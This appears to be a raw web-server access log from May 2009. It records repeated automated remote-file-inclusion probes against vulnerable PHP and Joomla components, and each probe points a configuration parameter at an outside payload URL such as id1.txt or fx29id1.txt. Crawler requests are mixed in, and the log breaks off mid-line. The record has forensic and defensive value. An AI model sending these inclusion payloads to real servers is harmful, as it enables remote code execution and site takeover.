217.147.29.190 - - [19/May/2009:05:03:12 -0400] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
217.147.29.190 - - [19/May/2009:05:03:12 -0400] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
217.147.29.190 - - [19/May/2009:05:03:12 -0400] "GET /logs/access_log.Q108071500%20%20/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
69.237.82.158 - - [19/May/2009:05:03:20 -0400] "GET /errors.php?error=http://www.starceiling123.com///administrator/components/com_users/default/FX29ID1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
69.237.82.158 - - [19/May/2009:05:03:20 -0400] "GET /logs/access_log.Q108082200/errors.php?error=http://www.starceiling123.com///administrator/components/com_users/default/FX29ID1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
69.237.82.158 - - [19/May/2009:05:03:20 -0400] "GET /logs/errors.php?error=http://www.starceiling123.com///administrator/components/com_users/default/FX29ID1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
217.147.29.190 - - [19/May/2009:05:03:21 -0400] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
217.147.29.190 - - [19/May/2009:05:03:21 -0400] "GET /logs/access_log.Q108071500/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
217.147.29.190 - - [19/May/2009:05:03:21 -0400] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
123.125.64.38 - - [19/May/2009:05:03:29 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
77.232.66.198 - - [19/May/2009:05:03:32 -0400] "GET /logs/access_log.Q108120600//image_upload.php?sbp=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
217.147.29.190 - - [19/May/2009:05:03:32 -0400] "GET /logs/access_log.Q108071500/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
217.147.29.190 - - [19/May/2009:05:03:35 -0400] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
217.147.29.190 - - [19/May/2009:05:03:35 -0400] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
217.147.29.190 - - [19/May/2009:05:03:38 -0400] "GET /logs/access_log.Q108061000%20%20/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
217.147.29.190 - - [19/May/2009:05:03:48 -0400] "GET /logs/access_log.Q108061000/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
217.147.29.190 - - [19/May/2009:05:03:56 -0400] "GET /logs/access_log.Q108061000/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
110.45.144.106 - - [19/May/2009:05:04:08 -0400] "GET /logs/access_log.Q108090400//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
217.147.29.190 - - [19/May/2009:05:04:11 -0400] "GET /logs/access_log.Q108071500%20%20/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:05:04:22 -0400] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:05:04:22 -0400] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:05:04:22 -0400] "GET /logs/access_log.Q108110900/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:05:04:23 -0400] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:05:04:23 -0400] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:05:04:23 -0400] "GET /logs/access_log.Q108110900/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:05:04:25 -0400] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:05:04:25 -0400] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:05:04:25 -0400] "GET /logs/access_log.Q108110900/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
220.181.7.84 - - [19/May/2009:05:04:25 -0400] "GET /logs/error_log.Q108040200 HTTP/1.1" 404 223 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
77.232.66.198 - - [19/May/2009:05:04:26 -0400] "GET /logs/access_log.Q108110900/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:05:04:26 -0400] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:05:04:26 -0400] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:05:04:26 -0400] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:05:04:26 -0400] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:05:04:26 -0400] "GET /logs/access_log.Q108110900/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
217.147.29.190 - - [19/May/2009:05:04:27 -0400] "GET /logs/access_log.Q108061000%20%20/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:05:04:28 -0400] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:05:04:28 -0400] "GET /logs/access_log.Q108110900/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:05:04:28 -0400] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:05:04:30 -0400] "GET /logs/access_log.Q108091400/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:05:04:33 -0400] "GET /logs/access_log.Q108091400/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:05:04:35 -0400] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:05:04:35 -0400] "GET /logs/access_log.Q108110900%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:05:04:35 -0400] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:05:04:35 -0400] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:05:04:35 -0400] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:05:04:35 -0400] "GET /logs/access_log.Q108110900%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:05:04:36 -0400] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:05:04:36 -0400] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:05:04:36 -0400] "GET /logs/access_log.Q108110900/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:05:04:39 -0400] "GET /logs/access_log.Q108091400%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:05:04:40 -0400] "GET /logs/access_log.Q108091400%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:05:04:46 -0400] "GET /logs/access_log.Q108110900/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:05:04:46 -0400] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:05:04:46 -0400] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:05:04:48 -0400] "GET /logs/access_log.Q108091400/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
209.175.180.194 - - [19/May/2009:05:04:49 -0400] "GET //snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
209.175.180.194 - - [19/May/2009:05:04:49 -0400] "GET /logs//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
209.175.180.194 - - [19/May/2009:05:04:49 -0400] "GET /logs/access_log.Q109022600%20%20//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:05:04:53 -0400] "GET /logs/access_log.Q108091400/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
72.52.230.168 - - [19/May/2009:05:04:56 -0400] "GET /logs//smf/smf.functions.php?pConfig_auth[smf_path]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
72.52.230.168 - - [19/May/2009:05:04:56 -0400] "GET //smf/smf.functions.php?pConfig_auth[smf_path]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
72.52.230.168 - - [19/May/2009:05:04:56 -0400] "GET /logs/access_log.Q108082900%20%20//smf/smf.functions.php?pConfig_auth[smf_path]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
88.191.103.144 - - [19/May/2009:05:04:59 -0400] "GET /logs//smf/smf.functions.php?pConfig_auth[smf_path]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
88.191.103.144 - - [19/May/2009:05:04:59 -0400] "GET //smf/smf.functions.php?pConfig_auth[smf_path]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
88.191.103.144 - - [19/May/2009:05:04:59 -0400] "GET /logs/access_log.Q108082900%20%20//smf/smf.functions.php?pConfig_auth[smf_path]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:05:05:00 -0400] "GET /logs/access_log.Q108120600%20%20//image_upload.php?sbp=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
85.214.83.196 - - [19/May/2009:05:05:12 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 200 452 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
219.85.63.226 - - [19/May/2009:05:05:12 -0400] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:05:05:12 -0400] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:05:05:12 -0400] "GET /logs/access_log.Q108110900%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
85.214.83.196 - - [19/May/2009:05:05:12 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 200 1959 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
110.45.144.106 - - [19/May/2009:05:05:14 -0400] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
110.45.144.106 - - [19/May/2009:05:05:14 -0400] "GET /logs/access_log.Q109022600%20%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
110.45.144.106 - - [19/May/2009:05:05:14 -0400] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
64.191.102.117 - - [19/May/2009:05:05:14 -0400] "GET /logs///components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
64.191.102.117 - - [19/May/2009:05:05:14 -0400] "GET /logs/access_log.Q109050300%20%20///components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:05:05:14 -0400] "GET /logs/access_log.Q108110900%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:05:05:14 -0400] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:05:05:14 -0400] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:05:05:16 -0400] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:05:05:16 -0400] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:05:05:16 -0400] "GET /logs/access_log.Q108110900/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:05:05:22 -0400] "GET /logs/access_log.Q108091400%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:05:05:23 -0400] "GET /logs/access_log.Q108091400%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:05:05:23 -0400] "GET /logs/access_log.Q108091400/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:05:05:26 -0400] "GET /logs/access_log.Q108091400/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:05:05:32 -0400] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:05:05:32 -0400] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:05:05:32 -0400] "GET /logs/access_log.Q108110900/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
72.52.230.168 - - [19/May/2009:05:05:33 -0400] "GET /logs/error_log.Q109050500%20%20//smf/smf.functions.php?pConfig_auth[smf_path]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
88.191.103.144 - - [19/May/2009:05:05:33 -0400] "GET /logs/error_log.Q109050500%20%20//smf/smf.functions.php?pConfig_auth[smf_path]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
209.175.180.194 - - [19/May/2009:05:05:36 -0400] "GET /logs/access_log.Q109051000%20%20//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:05:05:36 -0400] "GET /logs/access_log.Q108091400/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:05:06:05 -0400] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:05:06:05 -0400] "GET /logs/access_log.Q108110900/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:05:06:05 -0400] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
64.191.102.117 - - [19/May/2009:05:06:09 -0400] "GET /logs/error_log.Q109050300%20%20///components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:05:06:09 -0400] "GET /logs/access_log.Q108091400/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:05:06:19 -0400] "GET /logs/access_log.Q108090100//include/write.php?dir=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
123.143.98.5 - - [19/May/2009:05:06:19 -0400] "GET //include/write.php?dir=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 404 216 "-" "libwww-perl/5.805"
123.143.98.5 - - [19/May/2009:05:06:19 -0400] "GET /logs//include/write.php?dir=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 404 221 "-" "libwww-perl/5.805"
123.143.98.5 - - [19/May/2009:05:06:20 -0400] "GET /logs/access_log.Q108111500//include/write.php?dir=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
123.143.98.5 - - [19/May/2009:05:06:25 -0400] "GET /logs/access_log.Q108090100//include/write.php?dir=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
123.143.98.5 - - [19/May/2009:05:06:25 -0400] "GET //include/write.php?dir=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 404 216 "-" "libwww-perl/5.805"
123.143.98.5 - - [19/May/2009:05:06:25 -0400] "GET /logs//include/write.php?dir=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 404 221 "-" "libwww-perl/5.805"
123.143.98.5 - - [19/May/2009:05:06:25 -0400] "GET /logs/access_log.Q108111500//include/write.php?dir=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
64.191.102.117 - - [19/May/2009:05:06:27 -0400] "GET /logs/access_log.Q109050300///components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
110.45.144.106 - - [19/May/2009:05:06:37 -0400] "GET /logs/access_log.Q108120600%20%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
66.249.72.114 - - [19/May/2009:05:06:55 -0400] "GET /cgi-bin/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L0044F74B09A0C400F2DB049+WSEQ(S0060):1+OUITEM(A0200):9600228 HTTP/1.1" 200 27010 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
217.147.29.190 - - [19/May/2009:05:06:55 -0400] "GET /logs/access_log.Q108061000/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
24.242.184.98 - - [19/May/2009:05:07:06 -0400] "GET /logs/access_log.Q109051100%20%20//admin.php?_shop_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
69.237.82.158 - - [19/May/2009:05:07:15 -0400] "GET /logs/access_log.Q108082200%20%20/errors.php?error=http://www.starceiling123.com///administrator/components/com_users/default/FX29ID1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
85.214.83.196 - - [19/May/2009:05:07:40 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 200 452 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
85.214.83.196 - - [19/May/2009:05:07:40 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 200 1959 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
217.147.29.190 - - [19/May/2009:05:07:44 -0400] "GET /logs/access_log.Q108061000/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.qdgymx.co